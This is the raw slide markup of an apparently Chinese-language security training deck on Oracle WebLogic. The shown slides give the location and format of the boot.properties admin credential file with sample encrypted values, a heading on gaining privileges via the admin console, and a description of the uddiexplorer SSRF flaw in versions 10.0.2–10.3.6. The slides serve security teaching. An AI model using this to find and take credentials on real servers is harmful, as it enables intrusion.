                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>实例的集合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r>
              <a:rPr sz="1600" spc="90" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Weblogic10++</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>域默认是安装完成后由用户创建。帐号密码也在创建域</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>的 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>时候设置，所以这里并不存在默认密码。当一个域创建完成后配置文件和</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>应用在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1191260">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Weblogic12/user_projects/domains</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="2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“</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="10" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>域名</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="84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”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3811270"/>
            <a:ext cx="1219200" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1219200" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1219200" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121920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68705" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1068705" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1068324" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1068324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56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Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>Weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>后台获取权限的方法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068324" y="2333244"/>
            <a:ext cx="9904730" cy="4277995"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9904730" h="4277995">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904476" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904476" y="4277867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="427786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3307" y="2328926"/>
            <a:ext cx="9914255" cy="4288155"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9914255" h="4288155">
                <a:moveTo>
                  <a:pt x="9909390" y="4287608"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="4287608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="4287380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="4286707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="4285653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="4284319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4282846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278083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="4278083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="4282846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="4282846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913924" y="4284319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913239" y="4285653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9912184" y="4286707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9910864" y="4287380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="4287608"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="4288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4288155">
                <a:moveTo>
                  <a:pt x="990462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5"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="4288155">
                <a:moveTo>
                  <a:pt x="9904628" y="4282846"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904628" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="4278083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="4278083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904628" y="4282846"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="4288155">
                <a:moveTo>
                  <a:pt x="9914153" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9909390" y="9525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5"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="4288155">
                <a:moveTo>
                  <a:pt x="9525" y="4282846"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="4278083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="4278083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="4282846"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="4288155">
                <a:moveTo>
                  <a:pt x="9904628" y="4282846"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="4282846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="4278083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904628" y="4278083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904628" y="4282846"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="4288155">
                <a:moveTo>
                  <a:pt x="9914153" y="4282846"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904628" y="4282846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="4278083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="4278083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="42828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8680" y="1422628"/>
            <a:ext cx="10515600" cy="510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latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>默认情况下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spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>weblogic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domain</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>启动时需要输入用户名和密码，为了不输入密码，可以在目录</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3556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Oracle/Middleware/user_projects/domains/epower2_dev/servers/AdminServer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>下创建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security</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>目录，  增加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boot.properties</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>文件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dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>实际目录根据项目不同而有区别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  <a:spcBef>
                <a:spcPts val="869"/>
              </a:spcBef>
            </a:pP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默认密码文件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553720" marR="918844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Weblogic </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>采用的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>3DES</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>三重数据加密算法）加密方式</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Weblogic </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>默认的管理密码配置文件位于</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>：  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>用户名和密码的配置信息主要在服务器的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>文件夹中</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>boot.properties</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>文件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44069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文件内容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897890" marR="775144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username=weblogic  password=password</a:t>
            </a:r>
            <a:endParaRPr sz="160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保存，退出，重启</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>domain, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>这时就不用输入密码了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4069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Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>而且启动过一次以后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会对</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>boot.properties</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>进行加</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>密</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="44069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spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> 9:</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="440690" marR="5250815" indent="457200" algn="r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userna</a:t>
            </a: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e={3DES}fy709SQ4pCHAFk+lIxiWfw==  password={3DES}fy709SQ4pCHAFk+lIxiWfw==</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="897890" marR="5287645" indent="-4572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Weblogic </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>12c: 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spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> 12c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>采用了</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>AES</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>对称加密方</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>式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#Mon Aug 19 14:50:12 CST</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600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2013</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="897890" marR="3085465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password={AES}Qjd77Jdiz+EvBxy/DNbrkpIkiYhprBwdiyoBCLh+ChY\=  username={AES}8M6clm3KIg4vZox4K35465sLj83zbba1aybLVY9ezZk\=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061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Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>Weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-80" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>存在的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272539" y="2314955"/>
            <a:ext cx="9904730" cy="1324610"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9904730" h="1324610">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904476" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904476" y="1324356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="132435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8298" y="2310726"/>
            <a:ext cx="9914255" cy="1333500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9914255" h="1333500">
                <a:moveTo>
                  <a:pt x="9909403" y="1332966"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1332966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3302" y="1332738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="1332064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="1331010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="1329677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9914166" y="1328204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913924" y="1329677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913251" y="1331010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9912197" y="1332064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9910876" y="1332738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909403" y="1332966"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255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333500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1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909403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9904641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1328204"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904641" y="1328204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909403" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914166" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914166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2539" y="3838955"/>
            <a:ext cx="9904730" cy="585470"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9904730" h="585470">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904476" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904476" y="585215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5852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8298" y="3834917"/>
            <a:ext cx="9914255" cy="594360"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9914255" h="594360">
                <a:moveTo>
                  <a:pt x="9909403" y="594309"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="594309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3302" y="594067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="593394"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="592340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="591007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="589546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84784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="584784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="589546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914166" y="589546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913924" y="591007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913251" y="592340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9912197" y="593394"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9910876" y="594067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909403" y="594309"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="5943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594360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594360">
                <a:moveTo>
                  <a:pt x="9904641" y="589546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584784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909403" y="584784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904641" y="589546"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="594360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594360">
                <a:moveTo>
                  <a:pt x="9525" y="589546"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="584784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="584784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="589546"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="594360">
                <a:moveTo>
                  <a:pt x="9904641" y="589546"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="589546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="584784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904641" y="584784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904641" y="589546"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="594360">
                <a:moveTo>
                  <a:pt x="9914166" y="589546"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904641" y="589546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909403" y="584784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914166" y="584784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914166" y="5895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2539" y="4637532"/>
            <a:ext cx="9904730" cy="1323340"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9904730" h="1323339">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904476" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904476" y="1322832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="132283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8298" y="4632591"/>
            <a:ext cx="9914255" cy="1333500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9914255" h="1333500">
                <a:moveTo>
                  <a:pt x="9909403" y="1332966"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1332966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3302" y="1332725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="1332052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="1330998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="1329677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9914166" y="1328204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913924" y="1329677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913251" y="1330998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9912197" y="1332052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9910876" y="1332725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909403" y="1332966"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255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333500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1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909403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9904641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1328204"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904641" y="1328204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909403" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914166" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914166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9851" y="1452250"/>
            <a:ext cx="10603865" cy="445262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Weblogic-uddiexplorer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处存在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SSRF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漏洞</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="724535" marR="2832100" indent="-255270">
              <a:lnSpc>
                <a:spcPct val="138100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="275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	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Weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600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10.0.2—10.3.6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版本的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SearchPublicRegistries.jsp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处会存在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SSRF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漏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洞 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="10" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>描述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724535" marR="155575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SSRF(Server-Side Request Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>服务器端请求伪造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是一种由攻击者构造形成由服务端发起请求的一</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>个 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>安全漏洞。一般情况下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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>攻击的目标是从外网无法访问的内部系统。（正是因为它是由服务端发起的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>，  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
